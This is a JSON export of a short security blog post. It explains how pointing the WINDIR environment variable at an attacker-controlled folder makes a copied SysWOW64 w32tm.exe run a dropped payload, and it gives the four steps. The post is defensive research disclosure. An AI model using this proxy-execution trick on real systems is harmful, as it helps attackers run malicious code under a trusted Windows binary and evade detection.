{"id":9108,"date":"2024-03-16T22:18:38","date_gmt":"2024-03-16T22:18:38","guid":{"rendered":"https:\/\/www.hexacorn.com\/blog\/?p=9108"},"modified":"2024-03-16T22:18:38","modified_gmt":"2024-03-16T22:18:38","slug":"lolbin-wow-ltd-x-2","status":"publish","type":"post","link":"https:\/\/www.hexacorn.com\/blog\/2024\/03\/16\/lolbin-wow-ltd-x-2\/","title":{"rendered":"Lolbin Wow Ltd x 2"},"content":{"rendered":"\n<p>I have already <a href=\"https:\/\/www.hexacorn.com\/blog\/2020\/05\/23\/lolbin-wow-ltd\/\" data-type=\"post\" data-id=\"7214\">covered<\/a> <a href=\"https:\/\/www.hexacorn.com\/blog\/2020\/05\/23\/lolbin-ltd\/\" data-type=\"post\" data-id=\"7195\">cases<\/a> where I abused WINDIR environment variable to LOLBINize some WoW executables.<\/p>\n\n\n\n<p>I thought I covered w32tm.exe before, but looking at my blog history I can&#8217;t find any reference to it.<\/p>\n\n\n\n<p>So, here it is:<\/p>\n\n\n\n<ol>\n<li>copy c:\\WINDOWS\\SysWOW64\\w32tm.exe .<\/li>\n\n\n\n<li>set windir=c:\\test<\/li>\n\n\n\n<li>drop payload as c:\\test\\sysnative\\w32tm.exe<\/li>\n\n\n\n<li>execute c:\\test\\w32tm.exe<\/li>\n<\/ol>\n\n\n\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/www.hexacorn.com\/blog\/wp-content\/uploads\/2024\/03\/w32rtm.png\"><img decoding=\"async\" loading=\"lazy\" width=\"314\" height=\"141\" src=\"https:\/\/www.hexacorn.com\/blog\/wp-content\/uploads\/2024\/03\/w32rtm.png\" alt=\"\" class=\"wp-image-9109\" srcset=\"https:\/\/www.hexacorn.com\/blog\/wp-content\/uploads\/2024\/03\/w32rtm.png 314w, https:\/\/www.hexacorn.com\/blog\/wp-content\/uploads\/2024\/03\/w32rtm-300x135.png 300w\" sizes=\"(max-width: 314px) 100vw, 314px\" \/><\/a><\/figure>\n","protected":false},"excerpt":{"rendered":"<p>I have already covered cases where I abused WINDIR environment variable to LOLBINize some WoW executables. I thought I covered w32tm.exe before, but looking at my blog history I can&#8217;t find any reference to it. So, here it is:<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[64],"tags":[],"_links":{"self":[{"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/posts\/9108"}],"collection":[{"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/comments?post=9108"}],"version-history":[{"count":1,"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/posts\/9108\/revisions"}],"predecessor-version":[{"id":9110,"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/posts\/9108\/revisions\/9110"}],"wp:attachment":[{"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/media?parent=9108"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/categories?post=9108"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/tags?post=9108"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}